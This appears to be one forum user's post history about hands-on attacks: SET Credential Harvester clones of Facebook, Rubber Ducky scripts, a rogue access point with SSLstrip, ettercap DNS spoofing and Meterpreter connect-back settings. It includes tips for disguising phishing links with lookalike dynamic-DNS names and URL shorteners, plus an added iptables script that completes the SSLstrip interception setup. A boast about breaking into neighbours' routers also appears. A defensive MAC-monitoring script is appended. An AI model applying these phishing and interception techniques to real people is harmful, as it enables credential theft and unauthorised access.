Ech3l0n

Active Members, 11 posts
  1. Thanks Apache, I will give the GUI d command a try. It's not the new driver bubble that is doing it. I put a 20 second delay in, everything loaded, then it opened the CMD prompt and it was not at the front for some reason. Tried it two more times after that, same thing. I was just messing with another script that didn't have an initial delay at the top and it did all kinds of crazy stuff; add a short delay and it opened the CMD prompt without issue. I am sure I will get the bugs worked out as I write my own scripts. Thanks again.
  2. Just got my Ducky and have been testing a few of the scripts on GitHub. One issue I have come across on a few scripts and a few different PCs is that when the administrator prompt is called up via CONTROL-SHIFT ENTER it does not come to the front, so the string that is to follow is not typed into the CMD window. Anyone else have this issue? It doesn't always happen; sometimes if I run the script again via the button, or unplug it and plug it back in, it will work properly, other times it will never work. On some PCs it works every time. It is not a delay issue, simply clicking the mouse on the CMD window does the trick, though of course it is usually through the string by that time. Any tips? Thanks
  3. When I use Credential Harvester on my internal LAN, for example to clone facebook.com, once I enter my username and password I get redirected to the real Facebook log-in page. When I use CH through NAT, everything works except the redirect. I end up getting a page that just shows an HTML tag meant to redirect me to the real log-in page:

     <html><head><meta HTTP-EQUIV="REFRESH" content="0; url=https://login.facebook.com/login.php"></head></html>

     Any idea how to fix this? I have gone through the set_config file and don't see anything in there that is set incorrectly. Any help would be great. Thanks, Ech3l0n

     UPDATE: It seems to be an issue with the way CH tries to redirect using meta refresh. This doesn't seem to be working; it works in IE and via a LAN attack in Firefox, but not when NAT'ed. Any ideas?
  4. I have used airbase-ng, two adapters and bridging to set up a rogue AP, and all is working well. I am able to connect to my rogue AP with another PC, and it passes the traffic from my rogue AP on mon0 to my eth1 interface seamlessly. I am able to sniff the traffic via the at0 interface created by airbase-ng. Next I was trying to set up SSLstrip between the two interfaces to grab passwords when I came across this problem.

     Turned on IPv4 forwarding:

     # echo 1 > /proc/sys/net/ipv4/ip_forward

     At this point the rogue AP is still working, my victim is still connected to the internet. Next I use iptables to forward all port 80 traffic to SSLstrip's default listening port of 10000:

     # iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000

     Now I start up SSLstrip:

     # python sslstrip.py -l 10000 -w sslpwords

     At this point my victim loses its internet connection. Actually just port 80, which was forwarded to SSLstrip; I can still SSH etc. So the issue seems to be that SSLstrip/iptables is not forwarding on the data. Is it possible that it is an issue with having multiple interfaces up? This worked with a simple ARP spoof attack with a single interface, but maybe SSLstrip does not know to forward the data back out eth1? There are several scripts that do all of this automatically, but I would rather learn the attack from a less automated perspective prior to using a Python script to do it all for me. I have combed through the scripts trying to figure out how they implement this attack but have not gotten far. Best I can tell is I need to do some additional work with iptables to get the data that is sent to SSLstrip back to the internet-connected interface. Any help is appreciated. Ech3l0n
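The rule set below is an added example, not part of the post above or of any SSLstrip/airbase-ng documentation. It shows the three pieces a routed at0 to eth1 interception path needs on the attacker box: forwarding enabled, the port 80 REDIRECT to the SSLstrip listener restricted to the victim-facing interface, and source NAT (MASQUERADE) on the internet-facing interface so the connections SSLstrip opens on the victim's behalf, and any other forwarded traffic, leave eth1 with a routable source address. The interface names at0/eth1 and port 10000 are taken from the post; the FORWARD rules and the assumption that at0 is routed (its own subnet) rather than bridged are mine. If at0 and eth1 are in a Linux bridge instead, the nat PREROUTING hook only sees bridged frames when net.bridge.bridge-nf-call-iptables is set to 1 (the br_netfilter module on newer kernels), which is a separate thing to check.

```shell
#!/bin/sh
# Added example: iptables/sysctl rule set for an at0 -> eth1 SSLstrip path.
# Set DRY_RUN=1 to print the commands instead of executing them (no root needed).

run() {
    if [ "${DRY_RUN:-0}" = "1" ]; then
        echo "$*"
    else
        "$@"
    fi
}

# sslstrip_rules INSIDE_IF OUTSIDE_IF SSLSTRIP_PORT
#   INSIDE_IF   interface the victim sits on (at0 from airbase-ng)
#   OUTSIDE_IF  internet-facing interface (eth1)
#   SSLSTRIP_PORT  port SSLstrip listens on (sslstrip.py -l PORT)
sslstrip_rules() {
    inside=$1
    outside=$2
    port=$3

    # 1. The box must route between the two interfaces at all.
    run sysctl -w net.ipv4.ip_forward=1

    # 2. Only the victim side's port 80 is pulled into the local listener;
    #    without -i, the attacker's own browsing would be redirected too.
    run iptables -t nat -A PREROUTING -i "$inside" -p tcp --dport 80 \
        -j REDIRECT --to-ports "$port"

    # 3. Everything leaving the internet-facing side gets the box's address,
    #    so replies come back to this host rather than to an unreachable
    #    victim subnet. SSLstrip's own upstream connections use the host IP
    #    directly, but the rest of the forwarded traffic needs this.
    run iptables -t nat -A POSTROUTING -o "$outside" -j MASQUERADE

    # 4. Permit the forwarded flows if the FORWARD policy is DROP.
    run iptables -A FORWARD -i "$inside" -o "$outside" -j ACCEPT
    run iptables -A FORWARD -i "$outside" -o "$inside" \
        -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
}

# Usage: DRY_RUN=1 sh sslstrip_nat.sh at0 eth1 10000   (preview)
#        sh sslstrip_nat.sh at0 eth1 10000              (apply, as root)
if [ $# -eq 3 ]; then
    sslstrip_rules "$1" "$2" "$3"
fi
```

Run it with DRY_RUN=1 first and compare the printed rules with `iptables -t nat -L -n -v` after applying; the packet counters on the REDIRECT rule tell you whether victim traffic is reaching the listener at all, and the MASQUERADE counter whether anything is making it out of eth1.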
  5. 2wire: Nice job. If you think that is bad security, the old ones were the same way but with 64-bit WEP... That took a whole 2 minutes to crack with aircrack back in the day. There were options to set it for WEP, 64-bit only, numbers only. You knew it was a 2wire by the SSID and just let her rip; I was in every 2wire on the block. Thanks for the info, I didn't realize the new ones were 10-digit WPA. Did you capture the handshake and then run your script against it, or just a straight brute force against the box? Ech3l0n
  6. I have one better for you, and thank you for pointing this out. I have used this many times, but of course the link then directs the victim PC to the actual address, which then shows up in the browser bar as the IP. At this point they have not committed yet and may shy away from entering their credentials. So I added another step to this. There are dozens of dynamic DNS sites out there that are free; just as an example, you could make facebook.picserver.org and point that to the IP address Credential Harvester is on, then TinyURL that as well, and now you have a nice one-two punch that will fool most people. I tried this out on some of my tech-savvy friends and they all went for it, even knowing my devious side. I was nice and didn't do anything to them ;) As a reminder, in Credential Harvester the connect-back address should be entered as the DNS name and not the IP; this way when they click the TinyURL, bit.ly etc. it will show up in the browser bar as the dynamic DNS name rather than the IP. If you put the IP in Credential Harvester it still shows up as the IP. Another reminder: use port forwarding, for example port 12345 points to 80 on your internal server with CH running on it. When making a TinyURL for this you have to enter the http://, so http://facebook.picserver.org:12345 = http://tinyurl.com/xyz. If you leave Credential Harvester running on 80 facing the web it will get whacked by someone in hours if not minutes. I use this as a proof of concept when talking to my clients' staff on the importance of not opening unfamiliar mail. I leave it running at home, SSH in with my Android and send someone a link; in the past I got burned because someone ran a tool against the open port 80 and brought down the listener. It really freaks out my clients' employees to see that password pop up on my phone right in front of them, and it cuts down on virus infections because they are now scared to click on anything. Ech3l0n
  7. How do you set the LHOST and LPORT on the Meterpreter payload that Fasttrack uses during its SQL exploits? As of now it assumes you are on the same LAN, so the payload goes out with a "connect back to" address of 192.168.x.x. I need it to have my external IP and then utilize port forwarding. This is straightforward in MSF, but Fasttrack does it all for you and I can't find a way to change this. Thanks for the help. Ech3l0n
  8. The extra 1 inch cable may just be a pull cord to help strip the outer coax sheath off, similar to what most Cat5 cables have. As stated above, it is directional, but that does not mean you will get your best signal pointing it directly at your target; the pattern of a yagi, especially a cheap one, can be all over the place, so move it around a bit. I don't know what your plans are for this, but you can build a hell of a wifi antenna out of an old sat dish and a soup can. I had built dozens before purchasing a nice 24 dB gain grid dish antenna. When it comes to antennas, like many other things, you get what you pay for. Ech3l0n
  9. Wow...you really thought that answer through LOL. Can't argue with that!
  10. Six or eight years ago I had a great little Windows program that would watch the network for what I assume were DHCP requests or ARP activity and then alert with a wav file or send an email if a MAC popped up that was not on the "approved" list. Looking for something similar, with email support. Can't find anything good. The only thing close I could find was WirelessNetView, but it has no email abilities, uses a scanner to check for new IPs, making a shit load of noise, and when a new MAC does connect and then disconnects it removes it from the list that I would have to check when I want to see who was on, completely useless! Interested in a Windows program, Win7, as I want to run it on the host PC and not gum up my VMs, but would be interested to know what is available for Linux if I can't find any options. Thanks, Ech3l0n
  11. First a quick hello as this is my first post on the forum, and a quick thanks for all the help I will be getting. Here is the setup. I set up a wireless LAN, one attacker with BT5r2 and one Win7 victim PC. I use SET Credential Harvester to set up a duplicate webpage. If I type the attack PC's IP address into the victim browser everything works great: the first log-in attempt fails, forwards the credentials to the attack PC, then presents the victim PC with the real site, on which I can then log in. To make the attack more convincing, I chose to use ettercap to do some DNS spoofing. So I edit the etter.dns file to send the victim PC to the attack PC when they type in X site. Now the victim can browse to said site, get redirected to the fake Credential Harvester site, and the browser address bar shows the site they typed in rather than the attack PC's IP address; everything is good up to here. The problem: when Credential Harvester sends the victim PC to the real site after the first log-in attempt, ettercap then again spoofs the site and sends that second request back to the attacker, and Credential Harvester has already shut down the fake site after getting the credentials, so to the victim PC it looks as if the site is down. So I have fixed the one problem of the browser bar not showing the legit site name, but in turn caused another by ettercap not allowing the victim PC to continue to the legit site. Is there any way around this? Maybe some type of scripting I can do with ettercap, or am I reinventing the wheel and there is already a better way to do this? I know one way is to just use ettercap with SSLstrip, but I want to specifically get this targeted attack working. Thanks for your help, Ech3l0n
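The script below is an added example of the detection logic post 10 describes, not code from the post or from any existing tool. It keeps an allowlist of approved MACs, consumes one observation per line (timestamp, event type, IP, MAC) and raises an alert the first time an unapproved MAC appears; the MAC is then remembered for the life of the process, so a device that connects and immediately disconnects still shows up in the report, which is the behaviour the post complains WirelessNetView lacks. The log format and sample lines are constructed for the example; in practice the lines would come from a DHCP server log, tcpdump, or a scapy sniffer on the host. Emailing is left to the caller via `format_alert`, which produces the message body.

```python
"""Added example: allowlist-based new-MAC detector over ARP/DHCP observations."""
import re
from dataclasses import dataclass, field

# Constructed sample input (not real captures). Format assumed for the
# example: "<timestamp> <arp|dhcp> <ip> <mac>". The DHCP line carries 0.0.0.0
# because a DISCOVER has no source address yet; the fourth line repeats a MAC
# in upper case to show that matching is case-insensitive.
SAMPLE_LINES = [
    "2012-05-01T08:00:01 arp 192.168.1.10 aa:bb:cc:00:00:01",
    "2012-05-01T08:00:05 dhcp 0.0.0.0 aa:bb:cc:00:00:02",
    "2012-05-01T08:01:10 arp 192.168.1.77 de:ad:be:ef:00:01",
    "2012-05-01T08:01:11 arp 192.168.1.77 DE:AD:BE:EF:00:01",
    "2012-05-01T08:02:00 dhcp 0.0.0.0 aa:bb:cc:00:00:01",
    "garbage line that should be ignored",
]

# Constructed allowlist: the two MACs the "owner" knows about.
APPROVED = {"aa:bb:cc:00:00:01", "aa:bb:cc:00:00:02"}

LINE_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<event>arp|dhcp)\s+"
    r"(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s+"
    r"(?P<mac>(?:[0-9a-fA-F]{2}:){5}[0-9a-fA-F]{2})$"
)


@dataclass
class Alert:
    mac: str
    first_seen: str
    ip: str
    event: str


@dataclass
class MacMonitor:
    approved: set
    # mac -> Alert; entries are never pruned, so a device that connected and
    # left is still listed when the owner comes back to check.
    seen: dict = field(default_factory=dict)

    def observe(self, line):
        """Return an Alert the first time an unapproved MAC is seen, else None."""
        m = LINE_RE.match(line.strip())
        if not m:
            return None            # malformed or unrelated line
        mac = m["mac"].lower()     # normalise case before any comparison
        if mac in self.approved or mac in self.seen:
            return None
        alert = Alert(mac, m["ts"], m["ip"], m["event"])
        self.seen[mac] = alert
        return alert


def format_alert(alert):
    """Plain-text message body for an alert, ready for smtplib or a log file."""
    return (
        f"Subject: unknown MAC {alert.mac} on LAN\n\n"
        f"first seen {alert.first_seen} via {alert.event} from {alert.ip}\n"
    )


def scan(lines, approved):
    """Run every line through one monitor and return the alerts in order."""
    monitor = MacMonitor({m.lower() for m in approved})
    return [a for a in (monitor.observe(line) for line in lines) if a]


if __name__ == "__main__":
    for alert in scan(SAMPLE_LINES, APPROVED):
        print(format_alert(alert))
```

Feeding it live data is a matter of replacing `SAMPLE_LINES` with an iterator over a log tail or a sniffer callback; the detection itself does no active scanning, which is the point: it only listens for ARP and DHCP the device already emits, so it generates no traffic of its own.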